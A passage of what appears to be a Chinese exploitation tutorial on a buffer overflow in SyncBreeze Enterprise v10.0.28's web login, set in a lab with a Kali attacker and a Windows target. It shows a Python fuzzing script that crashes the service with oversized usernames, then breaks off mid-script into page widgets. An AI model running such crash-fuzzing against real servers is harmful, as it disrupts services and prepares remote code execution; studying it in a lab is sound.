windows 32位缓冲区溢出漏洞

本文详细介绍了一次针对SyncBreeze Enterprise v10.0.28版本的Web服务漏洞利用过程,包括溢出长度的确定、EIP寄存器偏移量定位、ESP寄存器偏移量和长度测量、jmp esp指令地址获取、坏字符排除以及最终的shellcode生成。

0x00 环境准备

  1. windows10 32位虚拟机作为目标靶机、kali作为攻击机
  2. Immunity Debugger调试工具+mona脚本、存在漏洞版本的软件Sync Breeze Enterprise v10.0.28
  3. syncbreeze 安装完后打开web服务,漏洞点在web服务上
    在这里插入图片描述

0x01 漏洞调试

1. fuzz溢出长度

已知漏洞点是在web页面的登录用户名处,首先对抓取登录的请求包,用脚本fuzz用户名长度,看多长会使服务崩溃

#!/usr/bin/python3
import socket
import time
import sys
size = 100
while(size < 2000):
  try:
    print("\nSending evil buffer with %s bytes" % size)
    inputBuffer = "A" * size
    content = "username=" + inputBuffer + "&password=A"
    buffer = "POST /login HTTP/1.1\r\n"
    buffer += "Host: 172.16.12.142\r\n"
    buffer += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\r\n"
    buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
    buffer += "Accept-Language: en-US,en;q=0.5\r\n"
    buffer += "Referer: http://172.16.12.142/login\r\n"
    buffer += "Connection: close\r\n"
    buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
    buffer += "Content-Length: "+str(len(content))+"\r\n"
    buffer += "\r\n"
    buffer += content
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("172.16.12.142", 80))
    s.send(buffer.encode())
    s.close()
    size += 100
    time.sleep(10)
  except:
    print(
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值